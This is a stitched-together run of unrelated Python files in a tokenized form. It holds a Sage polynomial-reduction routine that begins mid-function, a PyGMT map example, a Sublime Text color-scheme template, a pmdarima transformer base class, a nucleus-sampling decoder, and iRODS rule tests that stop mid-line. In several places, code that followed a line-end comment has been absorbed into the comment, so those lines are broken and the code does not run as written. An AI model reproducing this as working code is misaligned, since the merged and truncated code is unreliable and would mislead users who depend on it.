<block_start>dl=du<line_sep>vl=vu<line_sep>du<augmul>2<line_sep>vu=epsF(du)<block_end># now dl < delta <= du logt=target.log()<line_sep>l2=(vu.log()-logt).n(prec=prec)<line_sep>l1=(vl.log()-logt).n(prec=prec)<line_sep>dn=(dl<times>l2-du<times>l1)/(l2-l1)<line_sep>vn=epsF(dn)<line_sep>dl=du<line_sep>vl=vu<line_sep>du=dn<line_sep>vu=vn<while_stmt>(du-dl).abs()<ge>target_tol<or>max(vl vu)<l>target<block_start>l2=(vu.log()-logt).n(prec=prec)<line_sep>l1=(vl.log()-logt).n(prec=prec)<line_sep>dn=(dl<times>l2-du<times>l1)/(l2-l1)<line_sep>vn=epsF(dn)<line_sep>dl=du<line_sep>vl=vu<line_sep>du=dn<line_sep>vu=vn<block_end><return>max(dl du)<block_end><def_stmt>get_bound_poly F prec=53 norm_type='norm' emb=<none><block_start>""" The hyperbolic distance from `j` which must contain the smallest poly. This defines the maximum possible distance from `j` to the `z_0` covariant in the hyperbolic 3-space for which the associated `F` could have smaller coefficients. INPUT: - ``F`` -- binary form of degree at least 3 with no multiple roots - ``prec``-- positive integer. precision to use in CC - ``norm_type`` -- string, either norm or height - ``emb`` -- embedding into CC OUTPUT: a positive real number EXAMPLES:: sage: from sage.rings.polynomial.binary_form_reduce import get_bound_poly sage: R.<x,y> = QQ[] sage: F = -2*x^3 + 2*x^2*y + 3*x*y^2 + 127*y^3 sage: get_bound_poly(F) # tol 1e-12 28.0049336543295 sage: get_bound_poly(F, norm_type='height') # tol 1e-11 111.890642019092 """<if_stmt>F.base_ring()<ne>ComplexField(prec=prec)<block_start><if_stmt>emb<is><none><block_start>compF=F.change_ring(ComplexField(prec=prec))<block_end><else_stmt><block_start>compF=F.change_ring(emb)<block_end><block_end><else_stmt><block_start>compF=F<block_end>n=F.degree()<assert_stmt>(n<g>2) "degree 2 polynomial"<line_sep>z0F,thetaF=covariant_z0(compF prec=prec emb=emb)<if_stmt>norm_type<eq>'norm'# euclidean norm squared <block_start>normF=(sum([abs(i)<power>2<for>i compF.coefficients()]))<line_sep>target=(2<power>(n-1))<times>normF/thetaF<block_end><elif_stmt>norm_type<eq>'height'<block_start>hF=exp(max([c.global_height(prec=prec)<for>c F.coefficients()]))# height target=(2<power>(n-1))<times>(n+1)<times>(hF<power>2)/thetaF<block_end><else_stmt><block_start><raise>ValueError('type must be norm or height')<block_end><return>cosh(epsinv(F target prec=prec))<block_end><def_stmt>smallest_poly F prec=53 norm_type='norm' emb=<none><block_start>r""" Determine the poly with smallest coefficients in `SL(2,\Z)` orbit of ``F`` Smallest can be in the sense of `L_2` norm or height. The method is the algorithm in Hutz-Stoll [HS2018]_. ``F`` needs to be a binary form with no multiple roots of degree at least 3. It should already be reduced in the sense of Cremona-Stoll [CS2003]_. INPUT: - ``F`` -- binary form of degree at least 3 with no multiple roots - ``norm_type`` -- string - ``norm`` or ``height`` controlling what ``smallest`` means for the coefficients. OUTPUT: pair [poly, matrix] EXAMPLES:: sage: from sage.rings.polynomial.binary_form_reduce import smallest_poly sage: R.<x,y> = QQ[] sage: F = -x^8 + 6*x^7*y - 7*x^6*y^2 - 12*x^5*y^3 + 27*x^4*y^4\ ....: - 4*x^3*y^5 - 19*x^2*y^6 + 10*x*y^7 - 5*y^8 sage: smallest_poly(F, prec=100) #long time [ -x^8 - 2*x^7*y + 7*x^6*y^2 + 16*x^5*y^3 + 2*x^4*y^4 - 2*x^3*y^5 + 4*x^2*y^6 - 5*y^8, <BLANKLINE> [1 1] [0 1] ] :: sage: from sage.rings.polynomial.binary_form_reduce import smallest_poly, get_bound_poly sage: R.<x,y> = QQ[] sage: F = -2*x^3 + 2*x^2*y + 3*x*y^2 + 127*y^3 sage: smallest_poly(F) [ [1 4] -2*x^3 - 22*x^2*y - 77*x*y^2 + 43*y^3, [0 1] ] sage: F0, M = smallest_poly(F, norm_type='height') sage: F0, M # random ( [5 4] -58*x^3 - 47*x^2*y + 52*x*y^2 + 43*y^3, [1 1] ) sage: M in SL2Z, F0 == R.hom(M * vector([x, y]))(F) (True, True) sage: get_bound_poly(F0, norm_type='height') # tol 1e-12 23.3402702199809 An example with a multiple root:: sage: R.<x,y> = QQ[] sage: F = -16*x^7 - 114*x^6*y - 345*x^5*y^2 - 599*x^4*y^3 - 666*x^3*y^4\ ....: - 481*x^2*y^5 - 207*x*y^6 - 40*y^7 sage: F.reduced_form() ( [-1 -1] -x^5*y^2 - 24*x^3*y^4 - 3*x^2*y^5 - 2*x*y^6 + 16*y^7, [ 1 0] ) """<def_stmt>insert_item pts item index# binary insertion to maintain list of points left to consider <block_start>N=len(pts)<if_stmt>N<eq>0<block_start><return>[item]<block_end><elif_stmt>N<eq>1<block_start><if_stmt>item[index]<g>pts[0][index]<block_start>pts.insert(0 item)<block_end><else_stmt><block_start>pts.append(item)<block_end><return>pts<block_end><else_stmt># binary insertion <block_start>left=1<line_sep>right=N<line_sep>mid=(left+right)<floordiv>2# these are ints so this is .floor() <if_stmt>item[index]<g>pts[mid][index]# item goes into first half <block_start><return>insert_item(pts[:mid] item index)+pts[mid:N]<block_end><else_stmt># item goes into second half <block_start><return>pts[:mid]+insert_item(pts[mid:N] item index)<block_end><block_end><block_end><def_stmt>coshdelta z# The cosh of the hyperbolic distance from z = t+uj to j <block_start><return>(z.norm()+1)/(2<times>z.imag())# reduce in the sense of Cremona-Stoll <block_end>G=F<line_sep>MG=matrix(ZZ 2 2 [1 0 0 1])<line_sep>x,y=G.parent().gens()<if_stmt>norm_type<eq>'norm'<block_start>current_size=sum([abs(i)<power>2<for>i G.coefficients()])# euclidean norm squared <block_end><elif_stmt>norm_type<eq>'height'# height <block_start>current_size=exp(max([c.global_height(prec=prec)<for>c G.coefficients()]))<block_end><else_stmt><block_start><raise>ValueError('type must be norm or height')<block_end>v0,th=covariant_z0(G prec=prec emb=emb)<line_sep>rep=2<times>CC.gen(0)# representative point in fundamental domain <import_from_stmt>math isnan<if_stmt>isnan(v0.abs())<block_start><raise>ValueError("invalid covariant: %s"%v0)<block_end>R=get_bound_poly(G prec=prec norm_type=norm_type)<line_sep># check orbit S=matrix(ZZ 2 2 [0 -1 1 0])<line_sep>T=matrix(ZZ 2 2 [1 1 0 1])<line_sep>TI=matrix(ZZ 2 2 [1 -1 0 1])<line_sep>count=0<line_sep>pts=[[G v0 rep MG coshdelta(v0) 0]]# label - 0:None, 1:S, 2:T, 3:T^(-1) current_min=[G v0 rep MG coshdelta(v0)]<while_stmt>pts<block_start>G,v,rep,M,D,label=pts.pop()<line_sep># apply ST and keep z, Sz <if_stmt>D<g>R<block_start><break># all remaining pts are too far away <block_end># check if it is smaller. If so, we can improve the bound count<augadd>1<if_stmt>norm_type<eq>'norm'<block_start>new_size=sum([abs(i)<power>2<for>i G.coefficients()])# euclidean norm squared <block_end><else_stmt># height <block_start>new_size=exp(max([c.global_height(prec=prec)<for>c G.coefficients()]))<block_end><if_stmt>new_size<l>current_size<block_start>current_min=[G v rep M coshdelta(v)]<line_sep>current_size=new_size<line_sep>R=get_bound_poly(G norm_type=norm_type prec=prec emb=emb)<block_end># add new points to check <if_stmt>label<ne>1<and>min((rep+1).norm() (rep-1).norm())<ge>1# don't undo S # the 2nd condition is equivalent to |\Re(-1/rep)| <= 1/2 # this means that rep can have resulted from an inversion step in # the shift-and-invert procedure, so don't invert # do inversion <block_start>z=-1/v<line_sep>new_pt=[G.subs({x:-y y:x}) z -1/rep M<times>S coshdelta(z) 1]<line_sep>pts=insert_item(pts new_pt 4)<block_end><if_stmt>label<ne>3# don't undo TI # do right shift <block_start>z=v-1<line_sep>new_pt=[G.subs({x:x+y}) z rep-1 M<times>T coshdelta(z) 2]<line_sep>pts=insert_item(pts new_pt 4)<block_end><if_stmt>label<ne>2# don't undo T # do left shift <block_start>z=v+1<line_sep>new_pt=[G.subs({x:x-y}) z rep+1 M<times>TI coshdelta(z) 3]<line_sep>pts=insert_item(pts new_pt 4)<block_end><block_end><return>[current_min[0] current_min[3]]<block_end>
""" Inset ----- The :meth:`pygmt.Figure.inset` method adds an inset figure inside a larger figure. The function is called using a ``with`` statement, and its ``position``, ``box``, ``offset``, and ``margin`` parameters are set. Plotting methods called within the ``with`` statement are applied to the inset figure. """<import_stmt>pygmt<line_sep>fig=pygmt.Figure()<line_sep># Create the primary figure, setting the region to Madagascar, the land color # to "brown", the water to "lightblue", the shorelines width to "thin", and # adding a frame fig.coast(region="MG+r2" land="brown" water="lightblue" shorelines="thin" frame="a")<line_sep># Create an inset, setting the position to top left, the width to 3.5 cm, and # the x- and y-offsets to 0.2 cm. The margin is set to 0, and the border is # "gold" with a pen size of 1.5p. <with_stmt>fig.inset(position="jTL+w3.5c+o0.2c" margin=0 box="+p1.5p,gold")# Create a figure in the inset using coast. This example uses the azimuthal # orthogonal projection centered at 47E, 20S. The land color is set to # "gray" and Madagascar is highlighted in "red3". <block_start>fig.coast(region="g" projection="G47/-20/?" land="gray" water="white" dcw="MG+gred3" )<block_end>fig.show()<line_sep>
""" Sublime Text Scheme template. Converts scheme to css provides templating for additonal so that they can access the colors. Licensed under MIT Copyright (c) 2015 - 2016 <NAME> <<EMAIL>> ---------------------- TextMate theme to CSS. https://manual.macromates.com/en/language_grammars#naming_conventions """<import_stmt>sublime<import_stmt>re<import_from_stmt>. version<as>ver<import_from_stmt>.rgba RGBA<import_from_stmt>.st_color_scheme_matcher ColorSchemeMatcher<import_stmt>jinja2<import_from_stmt>pygments.formatters HtmlFormatter<import_from_stmt>collections OrderedDict<import_from_stmt>.st_clean_css clean_css<import_stmt>copy<import_stmt>decimal<line_sep>NEW_SCHEMES=int(sublime.version())<ge>3150<line_sep>INVALID=-1<line_sep>POPUP=0<line_sep>PHANTOM=1<line_sep>LUM_MIDPOINT=127<line_sep>re_float_trim=re.compile(r'^(?P<keep>\d+)(?P<trash>\.0+|(?P<keep2>\.\d*[1-9])0+)$')<line_sep>re_valid_custom_scopes=re.compile(r'[a-zA-Z\d]+[a-zA-Z\d._\-]*')<line_sep>re_missing_semi_colon=re.compile(r'(?<!;) \}')<line_sep>re_base_colors=re.compile(r'^\s*\.(?:dummy)\s*\{([^}]+)\}' re.MULTILINE)<line_sep>re_color=re.compile(r'(?<!-)(color\s*:\s*#[A-Fa-z\d]{6})')<line_sep>re_bgcolor=re.compile(r'(?<!-)(background(?:-color)?\s*:\s*#[A-Fa-z\d]{6})')<line_sep>re_pygments_selectors=re.compile(r'\.dummy (\.[a-zA-Z\d]+) ')<line_sep>CODE_BLOCKS='.mdpopups .highlight, .mdpopups .inline-highlight { %s; %s; }'<def_stmt>fmt_float f p=0<block_start>"""Set float precision and trim precision zeros."""<line_sep>string=str(decimal.Decimal(f).quantize(decimal.Decimal('0.'+('0'<times>p)<if>p<g>0<else>'0') decimal.ROUND_HALF_UP))<line_sep>m=re_float_trim.match(string)<if_stmt>m<block_start>string=m.group('keep')<if_stmt>m.group('keep2')<block_start>string<augadd>m.group('keep2')<block_end><block_end><return>string<block_end><class_stmt>SchemeTemplate(object)<block_start>"""Determine color scheme colors and style for text in a Sublime view buffer."""<def_stmt>__init__ self scheme_file<block_start>"""Initialize."""<line_sep>self.scheme_file=scheme_file<line_sep>self.css_type=INVALID<line_sep>self.variable={}<line_sep>self.view=<none><line_sep>self.setup()<block_end><def_stmt>guess_style self view scope selected=<false> explicit_background=<false><block_start>"""Guess color."""<line_sep># Remove leading '.' to account for old style CSS class scopes. <if_stmt><not>NEW_SCHEMES<block_start><return>self.csm.guess_color(scope.lstrip('.') selected explicit_background)<block_end><else_stmt><block_start>scope_style=view.style_for_scope(scope.lstrip('.'))<line_sep>style={}<line_sep>style['foreground']=scope_style['foreground']<line_sep>style['background']=scope_style.get('background')<line_sep>style['bold']=scope_style['bold']<line_sep>style['italic']=scope_style['italic']<line_sep>defaults=view.style()<if_stmt><not>explicit_background<and><not>style.get('background')<block_start>style['background']=defaults.get('background' '#FFFFFF')<block_end><if_stmt>selected<block_start>sfg=scope_style.get('selection_forground' defaults.get('selection_forground'))<if_stmt>sfg<block_start>style['foreground']=sfg<block_end>style['background']=scope_style.get('selection' '#0000FF')<block_end><return>style<block_end><block_end><def_stmt>legacy_parse_global self<block_start>""" Parse global settings. LEGACY. """<line_sep>self.csm=ColorSchemeMatcher(self.scheme_file)<line_sep># Get general theme colors from color scheme file self.bground=self.csm.special_colors['background']['color_simulated']<line_sep>rgba=RGBA(self.bground)<line_sep>self.lums=rgba.get_true_luminance()<line_sep>is_dark=self.lums<le>LUM_MIDPOINT<line_sep>self._variables={"is_dark":is_dark "is_light":<not>is_dark "sublime_version":int(sublime.version()) "mdpopups_version":ver.version() "color_scheme":self.scheme_file "use_pygments":self.use_pygments "default_style":self.default_style}<line_sep>self.html_border=rgba.get_rgb()<line_sep>self.fground=self.csm.special_colors['foreground']['color_simulated']<block_end><def_stmt>get_variables self<block_start>"""Get variables."""<if_stmt>NEW_SCHEMES<block_start>is_dark=self.is_dark()<line_sep><return>{"is_dark":is_dark "is_light":<not>is_dark "sublime_version":int(sublime.version()) "mdpopups_version":ver.version() "color_scheme":self.scheme_file "use_pygments":self.use_pygments "default_style":self.default_style}<block_end><else_stmt><block_start><return>self._variables<block_end><block_end><def_stmt>get_html_border self<block_start>"""Get html border."""<line_sep><return>self.get_bg()<if>NEW_SCHEMES<else>self.html_border<block_end><def_stmt>is_dark self<block_start>"""Check if scheme is dark."""<line_sep><return>self.get_lums()<le>LUM_MIDPOINT<block_end><def_stmt>get_lums self<block_start>"""Get luminance."""<if_stmt>NEW_SCHEMES<block_start>bg=self.get_bg()<line_sep>rgba=RGBA(bg)<line_sep><return>rgba.get_true_luminance()<block_end><else_stmt><block_start><return>self.lums<block_end><block_end><def_stmt>get_fg self<block_start>"""Get foreground."""<line_sep><return>self.view.style().get('foreground' '#000000')<if>NEW_SCHEMES<else>self.fground<block_end><def_stmt>get_bg self<block_start>"""Get backtround."""<line_sep><return>self.view.style().get('background' '#FFFFFF')<if>NEW_SCHEMES<else>self.bground<block_end><def_stmt>setup self<block_start>"""Setup the template environment."""<line_sep>settings=sublime.load_settings("Preferences.sublime-settings")<line_sep>self.use_pygments=<not>settings.get('mdpopups.use_sublime_highlighter' <true>)<line_sep>self.default_style=settings.get('mdpopups.default_style' <true>)<if_stmt><not>NEW_SCHEMES<block_start>self.legacy_parse_global()<block_end># Create Jinja template self.env=jinja2.Environment()<line_sep>self.env.filters['css']=self.retrieve_selector<line_sep>self.env.filters['pygments']=self.pygments<line_sep>self.env.filters['foreground']=self.to_fg<line_sep>self.env.filters['background']=self.to_bg<line_sep>self.env.filters['brightness']=self.brightness<line_sep>self.env.filters['colorize']=self.colorize<line_sep>self.env.filters['hue']=self.hue<line_sep>self.env.filters['invert']=self.invert<line_sep>self.env.filters['saturation']=self.saturation<line_sep>self.env.filters['contrast']=self.contrast<line_sep>self.env.filters['grayscale']=self.grayscale<line_sep>self.env.filters['sepia']=self.sepia<line_sep>self.env.filters['fade']=self.fade<line_sep>self.env.filters['getcss']=self.read_css<block_end><def_stmt>read_css self css<block_start>"""Read the CSS file."""<try_stmt><block_start>var=copy.copy(self.variables)<line_sep>var.update({'is_phantom':self.css_type<eq>PHANTOM 'is_popup':self.css_type<eq>POPUP})<line_sep><return>self.env.from_string(clean_css(sublime.load_resource(css))).render(var=var plugin=self.plugin_vars)<block_end><except_stmt>Exception<block_start><return>''<block_end><block_end><def_stmt>fade self css factor<block_start>""" Apply a fake transparency to color. Fake transparency is preformed on top of the background color. """<try_stmt><block_start>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<in>('background-color' 'color')<block_start>rgba=RGBA(parts[1]+"%02f"%int(255.0<times>max(min(float(factor) 1.0) 0.0)))<line_sep>rgba.apply_alpha(self.get_bg())<line_sep><return>'%s: %s; '%(parts[0] rgba.get_rgb())<block_end><block_end><except_stmt>Exception<block_start><pass><block_end><return>css<block_end><def_stmt>colorize self css degree<block_start>"""Colorize to the given hue."""<line_sep>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<in>('background-color' 'color')<block_start>rgba=RGBA(parts[1])<line_sep>rgba.colorize(degree)<line_sep>parts[1]="%s; "%rgba.get_rgb()<line_sep><return>'%s: %s '%(parts[0] parts[1])<block_end><return>css<block_end><def_stmt>hue self css degree<block_start>"""Shift hue."""<line_sep>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<in>('background-color' 'color')<block_start>rgba=RGBA(parts[1])<line_sep>rgba.hue(degree)<line_sep>parts[1]="%s; "%rgba.get_rgb()<line_sep><return>'%s: %s '%(parts[0] parts[1])<block_end><return>css<block_end><def_stmt>invert self css<block_start>"""Invert color."""<line_sep>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<in>('background-color' 'color')<block_start>rgba=RGBA(parts[1])<line_sep>rgba.invert()<line_sep>parts[1]="%s; "%rgba.get_rgb()<line_sep><return>'%s: %s '%(parts[0] parts[1])<block_end><return>css<block_end><def_stmt>contrast self css factor<block_start>"""Apply contrast filter."""<line_sep>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<in>('background-color' 'color')<block_start>rgba=RGBA(parts[1])<line_sep>rgba.contrast(factor)<line_sep>parts[1]="%s; "%rgba.get_rgb()<line_sep><return>'%s: %s '%(parts[0] parts[1])<block_end><return>css<block_end><def_stmt>saturation self css factor<block_start>"""Apply saturation filter."""<line_sep>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<in>('background-color' 'color')<block_start>rgba=RGBA(parts[1])<line_sep>rgba.saturation(factor)<line_sep>parts[1]="%s; "%rgba.get_rgb()<line_sep><return>'%s: %s '%(parts[0] parts[1])<block_end><return>css<block_end><def_stmt>grayscale self css<block_start>"""Apply grayscale filter."""<line_sep>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<in>('background-color' 'color')<block_start>rgba=RGBA(parts[1])<line_sep>rgba.grayscale()<line_sep>parts[1]="%s; "%rgba.get_rgb()<line_sep><return>'%s: %s '%(parts[0] parts[1])<block_end><return>css<block_end><def_stmt>sepia self css<block_start>"""Apply sepia filter."""<line_sep>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<in>('background-color' 'color')<block_start>rgba=RGBA(parts[1])<line_sep>rgba.sepia()<line_sep>parts[1]="%s; "%rgba.get_rgb()<line_sep><return>'%s: %s '%(parts[0] parts[1])<block_end><return>css<block_end><def_stmt>brightness self css factor<block_start>"""Adjust brightness."""<line_sep>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<in>('background-color' 'color')<block_start>rgba=RGBA(parts[1])<line_sep>rgba.brightness(factor)<line_sep>parts[1]="%s; "%rgba.get_rgb()<line_sep><return>'%s: %s '%(parts[0] parts[1])<block_end><return>css<block_end><def_stmt>to_fg self css<block_start>"""Rename a CSS key value pair."""<line_sep>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<eq>'background-color'<block_start>parts[0]='color'<line_sep><return>'%s: %s; '%(parts[0] parts[1])<block_end><return>css<block_end><def_stmt>to_bg self css<block_start>"""Rename a CSS key value pair."""<line_sep>parts=[c.strip('; ')<for>c css.split(':')]<if_stmt>len(parts)<eq>2<and>parts[0]<eq>'color'<block_start>parts[0]='background-color'<line_sep><return>'%s: %s; '%(parts[0] parts[1])<block_end><return>css<block_end><def_stmt>pygments self style<block_start>"""Get pygments style."""<line_sep><return>get_pygments(style)<block_end><def_stmt>retrieve_selector self selector key=<none> explicit_background=<true><block_start>"""Get the CSS key, value pairs for a rule."""<if_stmt>NEW_SCHEMES<block_start>general=self.view.style()<line_sep>fg=general.get('foreground' '#000000')<line_sep>bg=general.get('background' '#ffffff')<line_sep>scope=self.view.style_for_scope(selector)<line_sep>style=[]<if_stmt>scope['bold']<block_start>style.append('bold')<block_end><if_stmt>scope['italic']<block_start>style.append('italic')<block_end>color=scope.get('foreground' fg)<line_sep>bgcolor=scope.get('background' (<none><if>explicit_background<else>bg))<block_end><else_stmt><block_start>scope=self.guess_style(self.view selector explicit_background=explicit_background)<line_sep>color=scope.fg_simulated<line_sep>bgcolor=scope.bg_simulated<line_sep>style=scope.style.split(' ')<block_end>css=[]<if_stmt>color<and>(key<is><none><or>key<eq>'color')<block_start>css.append('color: %s'%color)<block_end><if_stmt>bgcolor<and>(key<is><none><or>key<eq>'background-color')<block_start>css.append('background-color: %s'%bgcolor)<block_end><for_stmt>s style<block_start><if_stmt>"bold"<in>s<and>(key<is><none><or>key<eq>'font-weight')<block_start>css.append('font-weight: bold')<block_end><if_stmt>"italic"<in>s<and>(key<is><none><or>key<eq>'font-style')<block_start>css.append('font-style: italic')<block_end><if_stmt>"underline"<in>s<and>(key<is><none><or>key<eq>'text-decoration')<and><false># disabled <block_start>css.append('text-decoration: underline')<block_end><block_end>text=';'.join(css)<if_stmt>text<block_start>text<augadd>';'<block_end><return>text<block_end><def_stmt>apply_template self view css css_type template_vars=<none><block_start>"""Apply template to css."""<line_sep>self.view=view<if_stmt>css_type<not><in>(POPUP PHANTOM)<block_start><return>''<block_end>self.css_type=css_type<line_sep>self.variables=self.get_variables()<line_sep>var=copy.copy(self.variables)<if_stmt>template_vars<and>isinstance(template_vars (dict OrderedDict))<block_start>self.plugin_vars=copy.deepcopy(template_vars)<block_end><else_stmt><block_start>self.plugin_vars={}<block_end>var.update({'is_phantom':self.css_type<eq>PHANTOM 'is_popup':self.css_type<eq>POPUP})<line_sep><return>self.env.from_string(css).render(var=var plugin=self.plugin_vars)<block_end><block_end><def_stmt>get_pygments style<block_start>""" Get pygments style. Subllime CSS support is limited. It cannot handle well things like: `.class1 .class2`, but it can handle things like: `.class1.class2`. So we will not use things like `.highlight` in front. We will first find {...} which has no syntax class. This will contain our background and possibly foreground. If for whatever reason we have no background or foreground, we will use `#000000` or `#ffffff` respectively. """<try_stmt># Lets see if we can find the pygments theme <block_start>text=HtmlFormatter(style=style).get_style_defs('.dummy')<line_sep>text=re_missing_semi_colon.sub('; }' text)<block_end><except_stmt>Exception<block_start><return>''<block_end>bg=<none><line_sep>fg=<none><line_sep># Find {...} which has no syntax classes m=re_base_colors.search(text)<if_stmt>m# Find background <block_start>m1=re_bgcolor.search(m.group(1))<if_stmt>m1# Use `background-color` as it works better # with Sublime CSS <block_start>bg=m1.group(1).replace('background' 'background-color')<block_end># Find foreground m1=re_color.search(m.group(1))<if_stmt>m1<block_start>fg=m1.group(1)<block_end><block_end># Use defaults if None found <if_stmt>bg<is><none><block_start>bg='background-color: #ffffff'<block_end><if_stmt>fg<is><none><block_start>fg='color: #000000'<block_end># Reassemble replacing .highlight {...} with .codehilite, .inlinehilite {...} # All other classes will be left bare with only their syntax class. code_blocks=CODE_BLOCKS<if_stmt>m<block_start>css=clean_css((text[:m.start(0)]+(code_blocks%(bg fg))+text[m.end(0):]+'\n'))<block_end><else_stmt><block_start>css=clean_css(((code_blocks%(bg fg))+'\n'+text+'\n'))<block_end><return>re_pygments_selectors.sub(r'.mdpopups .highlight \1' css)<block_end>
# -*- coding: utf-8 -*- <import_stmt>abc<import_from_stmt>..base BaseTransformer<class_stmt>BaseEndogTransformer(BaseTransformer metaclass=abc.ABCMeta)<block_start>"""A base class for endogenous array transformers"""<def_stmt>_check_y_X self y X<block_start>"""Check the endog and exog arrays"""<line_sep>y,X=super(BaseEndogTransformer self)._check_y_X(y X)<if_stmt>y<is><none><block_start><raise>ValueError("y must be non-None for endogenous transformers")<block_end><return>y X<block_end>@abc.abstractmethod<def_stmt>inverse_transform self y X=<none> **kwargs# TODO: remove kwargs <block_start>"""Inverse transform a transformed array Inverse the transformation on the transformed array. Parameters ---------- y : array-like or None, shape=(n_samples,) The transformed endogenous (time-series) array. X : array-like or None, shape=(n_samples, n_features), optional The exogenous array of additional covariates. Not used for endogenous transformers. Default is None, and non-None values will serve as pass-through arrays. Returns ------- y : array-like or None The inverse-transformed y array X : array-like or None The inverse-transformed exogenous array """<block_end><block_end>
r""" Nucleus Sampling was introduced in the paper `The Curious Case of Neural Text Degeneration <https://arxiv.org/abs/1904.09751>`_. If you take it from here, make sure to cite them: .. code-block:: text @inproceedings{, title={The Curious Case of Neural Text Degeneration}, author={<NAME> and <NAME> and <NAME> and <NAME> and <NAME>}, journal={ICLR}, year={2020} } Some core parts of this code are adapted with minor modifications from Thomas Wolf's gist: https://gist.githubusercontent.com/thomwolf/1a5a29f6962089e871b94cbd09daf317 """<import_from_stmt>typing Callable List Tuple<import_stmt>torch<import_stmt>torch.nn.functional<as>F<class_stmt>AutoRegressiveNucleusSampling(object)<block_start>r""" Implements the nucleus sampling for decoding captions. This class only works for auto-regressive models (Transformer-like), not recurrent models (LSTM-like). Args: eos_index: The index of the end token (``[EOS]``) in vocabulary. max_steps: The maximum number of decoding steps. nucleus_size: Size of top-K nucleus for sampling. """<def_stmt>__init__ self eos_index:int max_steps:int=50 nucleus_size:float=0.9 <block_start>super().__init__()<line_sep>self._eos_index=eos_index<line_sep>self.max_steps=max_steps<line_sep>self.nucleus_size=nucleus_size<block_end><def_stmt>search self start_predictions:torch.Tensor step:Callable[<ellipsis> torch.Tensor]<arrow>Tuple[torch.Tensor <none>]<block_start>batch_size=start_predictions.size()[0]<line_sep># List of `(batch_size, )` tensors. One for each timestep. # This includes the start-of-sentence tokens, unlike the implementation # in `AutoregressiveBeamSearch`. We will remove them in the end. predictions:List[torch.Tensor]=[start_predictions]<for_stmt>timestep range(self.max_steps)# Get the predictions from last timestep (most recent). # shape: (batch_size, ) <block_start>last_predictions=predictions[-1]<line_sep># If every predicted token from the last step is end-of-sentence token, # then we can stop early. <if_stmt>(last_predictions<eq>self._eos_index).all()<block_start><break><block_end># Combine step predictions made so far into one tensor. This is our # "partial" caption input to the transformer. # shape: (batch_size, timestep + 1) predictions_so_far=torch.stack(predictions).permute(1 0)<line_sep># Take a step, get the distribution of logits from next timestep. # shape: (batch_size, num_classes) current_logits=step(predictions_so_far)<line_sep># Sort logits in descending order to determine the nucleus. sorted_logits,sorted_idx=torch.sort(current_logits descending=<true>)<line_sep># Get cumulative softmax probabilites. For every instance in batch, a # variable amount of tokens (N) will consitute the nucleus. # shape: (batch_size, num_classes) cumulative_probs=torch.cumsum(F.softmax(sorted_logits dim=-1) dim=-1)<line_sep># Determine indices of tokens at the tail of distribution. These will be # removed from the nucleus. sorted_idx_to_remove=cumulative_probs<g>self.nucleus_size<line_sep># Shift the indices to the right to keep the first token outside nucleus. sorted_idx_to_remove[<ellipsis> 1:]=sorted_idx_to_remove[<ellipsis> :-1].clone()<line_sep>sorted_idx_to_remove[<ellipsis> 0]=0<line_sep># Set logits to large negative value to avoid sampling them. Iterate over # the batch of examples. <for_stmt>t range(current_logits.size()[0])<block_start>idx_to_remove=sorted_idx[t][sorted_idx_to_remove[t]]<line_sep>current_logits[t][idx_to_remove]=-1e12<line_sep># Set logits for last predicted token to a large negative value to # avoid repetition. current_logits[t][last_predictions[t]]=-1e12<block_end># Sample from the filtered distribution. # shape: (batch_size, num_classes) current_probs=F.softmax(current_logits dim=-1)<line_sep># shape: (batch_size, ) current_predictions=torch.multinomial(current_probs 1)<line_sep>current_predictions=current_predictions.view(batch_size)<line_sep># Set current predicted tokens to be end-of-sentence for instances where # last prediction was also end-of-sentence token. current_predictions[last_predictions<eq>self._eos_index]=self._eos_index<line_sep>predictions.append(current_predictions)<block_end># Remove start-of-sentence token from predictions, and collect them together. # shape: (batch_size, max_steps) .. or could be less than max_steps. all_predictions=torch.stack(predictions[1:]).permute(1 0)<line_sep># We don't return any logprobs of generated sequence with nucleus sampling, # unlike `AutoregressiveBeamSearch`. <return>all_predictions <none><block_end><block_end>
<import_from_future_stmt> print_function<import_stmt>sys<if_stmt>sys.version_info<ge>(2 7)<block_start><import_stmt>unittest<block_end><else_stmt><block_start><import_stmt>unittest2<as>unittest<block_end><import_from_stmt>.. lib<import_from_stmt>.. paths<import_from_stmt>.. test<import_from_stmt>.resource_suite ResourceBase<import_from_stmt>..configuration IrodsConfig<class_stmt>Test_Irule(ResourceBase unittest.TestCase)<block_start>plugin_name=IrodsConfig().default_rule_engine_plugin<line_sep>class_name='Test_Irule'<def_stmt>setUp self<block_start>super(Test_Irule self).setUp()<block_end><def_stmt>tearDown self<block_start>super(Test_Irule self).tearDown()<block_end>@unittest.skipIf(test.settings.TOPOLOGY_FROM_RESOURCE_SERVER<or>plugin_name<eq>'irods_rule_engine_plugin-python' 'Skip for topology testing from resource server: reads server log')@unittest.skipUnless(plugin_name<eq>'irods_rule_engine_plugin-irods_rule_language' 'tests cache update - only applicable for irods_rule_language REP')<def_stmt>test_irule_printHello_in_serverLog_4189 self<block_start>svr_log_path=paths.server_log_path()<line_sep>initial_log_size=lib.get_file_size_by_path(svr_log_path)<line_sep>_,_,rc=self.admin.run_icommand(['irule' 'printHello' 'hi' 'null'])<line_sep># With the above invalid parameter ("hi"), irule should return an error code to OS... self.assertNotEqual(rc 0)<line_sep># and shouldn't run the requested operation: i.e., writing to the log. lib.delayAssert(<lambda>:lib.log_message_occurrences_equals_count(msg='\nHello' count=0 start_index=initial_log_size))<block_end>@unittest.skipUnless(plugin_name<eq>'irods_rule_engine_plugin-irods_rule_language' 'tests cache update - only applicable for irods_rule_language REP')<def_stmt>test_irule_printVariables_on_stdout_4189 self<block_start>stdout,stderr,rc=self.admin.run_icommand(['irule' 'writeLine("stdout","[*a][*b]")' '*a=1%*b=2' 